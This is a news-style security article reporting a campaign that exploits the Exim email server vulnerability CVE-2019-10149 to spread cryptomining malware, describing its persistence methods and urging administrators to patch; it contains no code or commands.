Major Cyber-Attack Targets Millions of Linux Email Servers
A recent cyber-attack campaign has been identified by researchers, focusing on millions of Linux email servers worldwide. This attack involves a cryptomining malware payload that poses a significant threat to the security of these servers.
Exim Vulnerability Puts Millions of Servers at Risk
The target of this cyber-attack is Exim, a popular email server software that accounts for over half (57%) of the internet’s email servers. A vulnerability known as CVE-2019-10149 was discovered last week, putting more than 3.5 million servers at risk of exploitation by malicious actors.
Sophisticated Attack Strategy
Researchers have identified two waves of attack in this campaign. The first wave involved attackers exploiting vulnerabilities from a command and control server on the clear web. The second wave, however, appears to be more sophisticated in nature.
According to security vendor Cybereason, the attackers are using a highly pervasive campaign that installs cron jobs for persistence and downloads multiple payloads for various stages of the attack. One of the payloads includes a port scanner written in Python, which scans for additional vulnerable servers on the internet and infects them with the initial script.
Root Access Compromise
One alarming aspect of this cyber-attack is the attackers’ ability to add an RSA authentication key to the SSH server, allowing them to connect to the server as root and gain complete control over it. This level of access poses a serious threat to the security and integrity of the affected servers.
Urgent Patching and Remediation
System administrators are strongly advised to patch their Exim servers immediately and remove any suspicious cron jobs. With worm-like capabilities at play, swift action is necessary to prevent further damage and ensure the protection of these vulnerable servers.
Hidden Intentions and Revenue Generation
The attackers behind this campaign have taken elaborate measures to conceal their intentions, utilizing hidden services on the TOR network and deceptive Windows icon files to evade detection. The prevalence of vulnerable Exim servers provides attackers with the opportunity to compromise numerous servers quickly and generate revenue through cryptocurrency mining.
Overall, the discovery of this cyber-attack highlights the importance of proactive security measures and vigilance in safeguarding critical infrastructure against evolving threats in the digital landscape.